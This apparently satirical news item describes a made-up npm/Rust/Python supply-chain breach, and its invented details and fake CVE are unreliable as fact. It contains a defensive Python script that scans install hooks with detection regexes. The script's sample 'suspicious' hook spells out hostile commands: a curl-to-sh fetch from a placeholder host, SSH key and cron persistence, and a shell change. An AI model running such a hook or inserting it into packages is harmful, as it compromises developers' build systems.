HeadlinesBriefing.com

Supply chain breach spreads through npm, Rust and Python tools

Hacker News

On March 3, maintainer Marcus Chen reported that his YubiKey, laptop and transit pass had been stolen. Shortly afterwards, a phishing site posing as a YubiKey store harvested his npm credentials: the bogus domain yubikey-official-store.net, registered six hours earlier, thanked him for his order and promised three-to-five-day delivery. Using the stolen tokens, the attacker published a malicious update to left-justify (847 million weekly downloads) that exfiltrated credential files to a server in a jurisdiction the attacker believed to be safe.

Those credentials granted access to vulpine-lz4, a Rust LZ4 compression crate bundled into cargo and later vendored by the Python build tool snekpack. A post-install script in vulpine-lz4 0.4.1 fetched and executed a remote shell script whenever the CI hostname matched strings such as “build” or “jenkins”. The payload added an SSH key, installed a reverse shell that activated only on Tuesdays, and switched users’ default shell to fish.
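As an added example (not code from the article or from any project it names), the following Python script triages package install hooks for the patterns this paragraph describes: hostname gating on CI names, fetch-and-execute of a remote script, and persistence via authorized_keys, cron or a default-shell change. The two sample hooks and the domain example.invalid are constructed for the demonstration.

```python
"""Static triage of package install hooks (npm postinstall, build scripts).
A hit means "a human should review this", not "confirmed malicious":
the patterns are deliberately broad so they also catch sloppy but benign hooks."""
import re

# Each indicator is (label, regex). Labels are returned sorted for stable output.
INDICATORS = [
    # hostname lookup followed on the same line by a CI-looking name
    ("ci-hostname-gate", re.compile(r"(hostname|HOSTNAME|gethostname)[^\n]*"
                                    r"(build|jenkins|ci)", re.I)),
    # download piped straight into a shell interpreter
    ("fetch-and-exec", re.compile(r"(curl|wget)[^\n|]*\|\s*(ba|z|)sh\b")),
    # SSH key persistence
    ("ssh-key-persistence", re.compile(r"authorized_keys")),
    # scheduled-task persistence
    ("cron-persistence", re.compile(r"\b(crontab|/etc/cron)")),
    # changing a user's login shell
    ("default-shell-change", re.compile(r"\b(chsh|usermod\s+-s)\b")),
]


def triage(script: str) -> list[str]:
    """Return the sorted list of indicator labels that match the hook text."""
    return sorted(label for label, rx in INDICATORS if rx.search(script))


# Constructed samples: a benign native-build hook and a suspicious one that
# mirrors the behaviour attributed to vulpine-lz4 0.4.1 in the write-up.
BENIGN = """#!/bin/sh
node scripts/build-native.js --release
"""
SUSPICIOUS = """#!/bin/sh
case "$(hostname)" in *build*|*jenkins*) ;; *) exit 0;; esac
curl -fsSL https://example.invalid/stage2.sh | sh
echo "ssh-ed25519 AAAA... placeholder" >> ~/.ssh/authorized_keys
(crontab -l; echo "0 3 * * 2 /tmp/.placeholder") | crontab -
chsh -s /usr/bin/fish "$USER"
"""

if __name__ == "__main__":
    for name, text in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(name, triage(text) or "clean")
```

Run it against the `postinstall` entries of a lockfile's packages or a crate's build script before allowing them to execute in CI; `npm install --ignore-scripts` gives you the time to do so.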

A separate cryptocurrency worm, cryptobro-9000, unintentionally upgraded snekpack to a clean 3.7.1 release, overwriting the compromised crate and halting the attack. Roughly 4 million developers received the malicious package, while an equal number were saved by the worm’s accidental rollback. The episode earned CVE-2024-YIKES and underscored fragile trust chains across the npm, Rust and Python ecosystems.